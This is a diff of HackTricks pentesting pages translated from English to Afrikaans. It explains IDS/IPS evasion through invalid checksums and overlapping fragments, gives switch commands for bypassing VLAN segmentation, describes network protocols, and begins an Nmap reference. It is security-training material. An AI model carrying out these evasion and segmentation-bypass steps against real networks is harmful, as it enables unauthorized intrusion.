Sensors bereken gewoonlik nie kontrolesom vir prestasie-redes nie. 'n Aanvaller kan dus 'n pakkie stuur wat deur die sensor **geïnterpreteer word, maar deur die finale gasheer verwerp word.** Voorbeeld:
Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid.
Stuur 'n pakkie met die vlag RST en 'n ongeldige kontrolesom, sodat die IPS/IDS dalk dink dat hierdie pakkie die verbinding gaan sluit, maar die finale gasheer sal die pakkie verwerp omdat die kontrolesom ongeldig is.
# **Uncommon IP and TCP options**
# **Ongewone IP- en TCP-opsies**
A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt.
'N Sensor kan pakkies met sekere vlae en opsies wat in IP- en TCP-koppe ingestel is, ignoreer, terwyl die bestemmingsgasheer die pakkie aanvaar wanneer dit ontvang word.
# **Overlapping**
# **Oorvleueling**
It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\
Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes.
Dit is moontlik dat wanneer jy 'n pakkie fragmenteer, daar 'n soort oorvleueling tussen pakkies bestaan (miskien oorvleuel die eerste 8 byte van pakkie 2 met die laaste 8 byte van pakkie 1, en die laaste 8 byte van pakkie 2 oorvleuel met die eerste 8 byte van pakkie 3). As die IDS/IPS hulle anders as die finale gasheer weer saamstel, sal 'n ander pakkie geïnterpreteer word.\
Of dalk kom 2 pakkies met dieselfde verskuiwing en die gasheer moet besluit watter een dit neem.
* **BSD**: It has preference for packets with smaller _offset_. For packets with same offset, it will choose the first one.
* **Linux**: Like BSD, but it prefers the last packet with the same offset.
* **First** (Windows): First value that comes, value that stays.
* **Last** (cisco): Last value that comes, value that stays.
* **BSD**: Dit het voorkeur vir pakkies met 'n kleiner _verskuiwing_. Vir pakkies met dieselfde verskuiwing, sal dit die eerste een kies.
* **Linux**: Soos BSD, maar dit verkies die laaste pakkie met dieselfde verskuiwing.
* **Eerste** (Windows): Eerste waarde wat kom, waarde wat bly.
* **Laaste** (cisco): Laaste waarde wat kom, waarde wat bly.
# Tools
# Hulpmiddels
* [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

62
generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
View file

@ -1,45 +1,38 @@
# Lateral VLAN Segmentation Bypass
# Laterale VLAN-segmentering omseil
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (**for further details check [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
As direkte toegang tot 'n skakelaar beskikbaar is, kan VLAN-segmentering omseil word. Dit behels die herkonfigurering van die gekoppelde poort na stammodus, die vestiging van virtuele interfaces vir teikenvlans, en die instelling van IP-adresse, óf dinamies (DHCP) óf staties, afhangende van die scenario (**vir verdere besonderhede, sien [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the **include** mask.
**If CDP is not operational, port identification can be attempted by searching for the MAC address**:
Aanvanklik is identifikasie van die spesifieke gekoppelde poort vereis. Dit kan tipies bereik word deur CDP-boodskappe, of deur te soek na die poort via die **include**-masker.
**As CDP nie operasioneel is nie, kan poortidentifikasie probeer word deur te soek na die MAC-adres**:
```
SW1(config)# show mac address-table | include 0050.0000.0500
```
Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10.
Voor die oorskakeling na stammodus, moet 'n lys van bestaande VLAN's saamgestel word en hul identifiseerders bepaal word. Hierdie identifiseerders word dan toegewys aan die koppelvlak, wat toegang tot verskillende VLAN's deur die stam moontlik maak. Die gebruikte poort is byvoorbeeld geassosieer met VLAN 10.
```
SW1# show vlan brief
```
**Transitioning to trunk mode entails entering interface configuration mode**:
**Oorgang na stammodus behels die ingang van die inteface-konfigurasie-modus**:
```
SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk
```
Oorskakeling na stammodus sal tydelik konnektiwiteit onderbreek, maar dit kan later herstel word.
Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently.
Virtual interfaces are then created, assigned VLAN IDs, and activated:
Virtuele interfaces word dan geskep, VLAN-ID's toegewys en geaktiveer:
```bash
sudo vconfig add eth0 10
sudo vconfig add eth0 20
@ -50,38 +43,33 @@ sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up
```
Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
Daarna word 'n adresversoek gedoen deur middel van DHCP. Alternatiewelik, in gevalle waar DHCP nie haalbaar is nie, kan adresse handmatig gekonfigureer word:
```bash
sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```
Example for manually setting a static IP address on an interface (VLAN 10):
Voorbeeld vir die handmatige instelling van 'n statiese IP-adres op 'n koppelvlak (VLAN 10):
```bash
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
```
Konnektiwiteit word getoets deur ICMP-versoeke na die verstekroetes vir VLANs 10, 20, 50 en 60 te begin.
Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.
Uiteindelik maak hierdie proses dit moontlik om VLAN-segmentering te omseil, wat onbeperkte toegang tot enige VLAN-netwerk fasiliteer, en stel die verhoog vir daaropvolgende aksies.
Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
## References
## Verwysings
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die [hacktricks-opslag](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-opslag](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

78
generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md
View file

@ -1,78 +1,72 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
</details>
## Multicast DNS (mDNS)
The **mDNS** protocol is designed for IP address resolution within small, local networks without a dedicated name server. It operates by multicasting a query within the subnet, prompting the host with the specified name to respond with its IP address. All devices in the subnet can then update their mDNS caches with this information.
Die **mDNS**-protokol is ontwerp vir IP-adresoplossing binne klein, plaaslike netwerke sonder 'n toegewyde naambediener. Dit werk deur 'n navraag binne die subnet uit te stuur, wat die gasheer met die gespesifiseerde naam aanmoedig om met sy IP-adres te reageer. Alle toestelle in die subnet kan dan hul mDNS-cache met hierdie inligting opdateer.
Key points to note:
- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero.
- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments.
- **Networking Details**:
- Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
- IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
- Operates over UDP port 5353.
- mDNS queries are confined to the local network and do not cross routers.
Belangrike punte om op te let:
- **Domeinnaamverlating**: 'n Gasheer kan sy domeinnaam vrylaat deur 'n pakkie met 'n TTL van nul te stuur.
- **Gebruiksbeperking**: mDNS los gewoonlik slegs name op wat eindig op **.local**. Konflikte met nie-mDNS-gasheerders in hierdie domein vereis netwerkkonfigurasie-aanpassings.
- **Netwerkdetails**:
- Ethernet-multicast-MAC-adresse: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
- IP-adresse: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
- Werk oor UDP-poort 5353.
- mDNS-navrae is beperk tot die plaaslike netwerk en steek nie roetings nie.
## DNS-SD (Service Discovery)
## DNS-SD (Diensontdekking)
DNS-SD is a protocol for discovering services on a network by querying specific domain names (e.g., `_printers._tcp.local`). A response includes all related domains, such as available printers in this case. A comprehensive list of service types can be found [here](http://www.dns-sd.org/ServiceTypes.html).
DNS-SD is 'n protokol vir die ontdekking van dienste op 'n netwerk deur spesifieke domeinname te ondervra (bv. `_printers._tcp.local`). 'n Antwoord sluit alle verwante domeine in, soos beskikbare drukkers in hierdie geval. 'n Omvattende lys van dienssoorte kan [hier](http://www.dns-sd.org/ServiceTypes.html) gevind word.
## SSDP (Simple Service Discovery Protocol)
## SSDP (Eenvoudige Diensontdekkingsprotokol)
SSDP facilitates the discovery of network services and is primarily utilized by UPnP. It's a text-based protocol using UDP over port 1900, with multicast addressing. For IPv4, the designated multicast address is `239.255.255.250`. SSDP's foundation is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), an extension of HTTP for UDP.
SSDP fasiliteer die ontdekking van netwerkdienste en word hoofsaaklik deur UPnP gebruik. Dit is 'n teksgebaseerde protokol wat UDP oor poort 1900 gebruik, met multicast-adressering. Vir IPv4 is die aangewese multicast-adres `239.255.255.250`. SSDP se grondslag is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), 'n uitbreiding van HTTP vir UDP.
## Web Service for Devices (WSD)
Devices connected to a network can identify available services, like printers, through the Web Service for Devices (WSD). This involves broadcasting UDP packets. Devices seeking services send requests, while service providers announce their offerings.
## Webdiens vir Toestelle (WSD)
Toestelle wat aan 'n netwerk gekoppel is, kan beskikbare dienste, soos drukkers, identifiseer deur middel van die Webdiens vir Toestelle (WSD). Dit behels die uitsaai van UDP-pakkies. Toestelle wat dienste soek, stuur versoek, terwyl diensverskaffers hul aanbiedinge aankondig.
## OAuth 2.0
OAuth 2.0 is a protocol facilitating secure, selective sharing of user information between services. For instance, it enables services to access user data from Google without multiple logins. The process involves user authentication, authorization by the user, and token generation by Google, allowing service access to the specified user data.
OAuth 2.0 is 'n protokol wat die veilige, selektiewe deling van gebruikersinligting tussen dienste fasiliteer. Dit maak dit byvoorbeeld moontlik vir dienste om toegang tot gebruikersdata van Google te verkry sonder veelvuldige aanmeldings. Die proses behels gebruikersverifikasie, magtiging deur die gebruiker, en token-generering deur Google, wat diens toegang tot die gespesifiseerde gebruikersdata moontlik maak.
## RADIUS
RADIUS (Remote Authentication Dial-In User Service) is a network access protocol primarily used by ISPs. It supports authentication, authorization, and accounting. User credentials are verified by a RADIUS server, potentially including network address verification for added security. Post-authentication, users receive network access and their session details are tracked for billing and statistical purposes.
RADIUS (Remote Authentication Dial-In User Service) is 'n netwerktoegangsprotokol wat hoofsaaklik deur internetdiensverskaffers gebruik word. Dit ondersteun verifikasie, magtiging en boekhouding. Gebruikerslegitimasie word geverifieer deur 'n RADIUS-bedieners, wat moontlik netwerkadresverifikasie vir bygevoegde sekuriteit kan insluit. Na verifikasie ontvang gebruikers netwerktoegang en word hul sessiebesonderhede vir fakturerings- en statistiese doeleindes gevolg.
## SMB and NetBIOS
## SMB en NetBIOS
### SMB (Server Message Block)
SMB is a protocol for sharing files, printers, and ports. It operates directly over TCP (port 445) or via NetBIOS over TCP (ports 137, 138). This dual compatibility enhances connectivity with various devices.
SMB is 'n protokol vir die deel van lêers, drukkers en poorte. Dit werk direk oor TCP (poort 445) of via NetBIOS oor TCP (poorte 137, 138). Hierdie dubbele verenigbaarheid verbeter die konnektiwiteit met verskillende toestelle.
### NetBIOS (Network Basic Input/Output System)
NetBIOS manages network sessions and connections for resource sharing. It supports unique names for devices and group names for multiple devices, enabling targeted or broadcast messaging. Communication can be connectionless (no acknowledgment) or connection-oriented (session-based). While NetBIOS traditionally operates over protocols like IPC/IPX, it's commonly used over TCP/IP. NetBEUI, an associated protocol, is known for its speed but was also quite verbose due to broadcasting.
NetBIOS bestuur netwerksessies en -verbindings vir die deling van hulpbronne. Dit ondersteun unieke name vir toestelle en groepname vir meervoudige toestelle, wat geteikende of uitsaai-boodskappe moontlik maak. Kommunikasie kan verbindingsloos (sonder bevestiging) of verbindingsgeoriënteerd (sessiegebaseerd) wees. Terwyl NetBIOS tradisioneel oor protokolle soos IPC/IPX werk, word dit algemeen oor TCP/IP gebruik. NetBEUI, 'n geassosieerde protokol, staan bekend om sy spoed, maar was ook nogal omslagtig as gevolg van uitsaai.
## LDAP (Lightweight Directory Access Protocol)
LDAP is a protocol enabling the management and access of directory information over TCP/IP. It supports various operations for querying and modifying directory information. Predominantly, it's utilized for accessing and maintaining distributed directory information services, allowing interaction with databases designed for LDAP communication.
LDAP is 'n protokol wat die bestuur en toegang tot gidsinligting oor TCP/IP moontlik maak. Dit ondersteun verskeie operasies vir die ondervraging en wysiging van gidsinligting. Dit word hoofsaaklik gebruik vir die toegang en instandhouding van verspreide gidsinligtingsdienste, wat interaksie met databasisse wat ontwerp is vir LDAP-kommunikasie moontlik maak.
## Active Directory (AD)
Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain.
Active Directory is 'n netwerktoeganklike databasis wat voorwerpe soos gebruikers, groepe, voorregte en hulpbronne bevat, wat die gesentraliseerde bestuur van netwerkentiteite fasiliteer. AD organiseer sy data in 'n hiërargiese struktuur van domeine, wat bedieners, groepe en gebruikers kan insluit. Subdomeine maak verdere segmentering moontlik, waarvan elkeen moontlik sy eie bediener en gebruikersbasis handhaaf. Hierdie struktuur sentraliseer gebruikersbestuur, wat toegang tot netwerkbronne verleen of beperk. Navrae kan gedoen word om spesifieke inligting, soos kontakbesonderhede, op te haal, of om hulpbronne, soos drukkers, binne die domein te vind.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ander maniere om HackTricks te ondersteun:
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-op

274
generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
View file

@ -1,104 +1,87 @@
# Nmap Summary (ESP)
# Nmap Opsomming (ESP)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
```
nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
```
## Parameters
### IPs to scan
### IP's om te skandeer
* **`<ip>,<net/mask>`:** Indicate the ips directly
* **`-iL <ips_file>`:** list\_IPs
* **`-iR <number>`**: Number of random Ips, you can exclude possible Ips with `--exclude <Ips>` or `--excludefile <file>`.
* **`<ip>,<net/mask>`:** Dui die IP's direk aan
* **`-iL <ips_file>`:** lys_IPs
* **`-iR <number>`**: Aantal lukrake IP's, jy kan moontlike IP's uitsluit met `--exclude <Ips>` of `--excludefile <file>`.
### Equipment discovery
### Toerusting ontdekking
By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP`
Standaard lanceer Nmap 'n ontdekkingsfase wat bestaan uit: `-PA80 -PS443 -PE -PP`
* **`-sL`**: It is not invasive, it lists the targets making **DNS** requests to resolve names. It is useful to know if for example www.prueba.es/24 all Ips are our targets.
* **`-Pn`**: **No ping**. This is useful if you know that all of them are active (if not, you could lose a lot of time, but this option also produces false negatives saying that they are not active), it prevents the discovery phase.
* **`-sn`** : **No port scan**. After completing the reconnaissance phase, it does not scan ports. It is relatively stealthy, and allows a small network scan. With privileges it sends an ACK (-PA) to 80, a SYN(-PS) to 443 and an echo request and a Timestamp request, without privileges it always completes connections. If the target is the network, it only uses ARP(-PR). If used with another option, only the packets of the other option are dropped.
* **`-PR`**: **Ping ARP**. It is used by default when analyzing computers in our network, it is faster than using pings. If you do not want to use ARP packets use `--send-ip`.
* **`-PS <ports>`**: It sends SYN packets to which if it answers SYN/ACK it is open (to which it answers with RST so as not to end the connection), if it answers RST it is closed and if it does not answer it is unreachable. In case of not having privileges, a total connection is automatically used. If no ports are given, it throws it to 80.
* **`-PA <ports>`**: Like the previous one but with ACK, combining both of them gives better results.
* **`-PU <ports>`**: The objective is the opposite, they are sent to ports that are expected to be closed. Some firewalls only check TCP connections. If it is closed it is answered with port unreachable, if it is answered with another icmp or not answered it is left as destination unreachable.
* **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, timestamp and addresmask. They are launched to find out if the target is active.
* **`-PY<ports>`**: Sends SCTP INIT probes to 80 by default, INIT-ACK(open) or ABORT(closed) or nothing or ICMP unreachable(inactive) can be replied.
* **`-PO <protocols>`**: A protocol is indicated in the headers, by default 1(ICMP), 2(IGMP) and 4(Encap IP). For ICMP, IGMP, TCP (6) and UDP (17) protocols the protocol headers are sent, for the rest only the IP header is sent. The purpose of this is that due to the malformation of the headers, Protocol unreachable or responses of the same protocol are answered to know if it is up.
* **`-n`**: No DNS
* **`-R`**: DNS always
* **`-sL`**: Dit is nie indringend nie, dit lys die teikens deur **DNS** navrae te maak om name op te los. Dit is nuttig om te weet of byvoorbeeld www.prueba.es/24 al die IP's ons teikens is.
* **`-Pn`**: **Geen ping**. Dit is nuttig as jy weet dat almal aktief is (as nie, kan jy baie tyd verloor, maar hierdie opsie gee ook vals negatiewe resultate deur te sê dat hulle nie aktief is nie), dit voorkom die ontdekkingsfase.
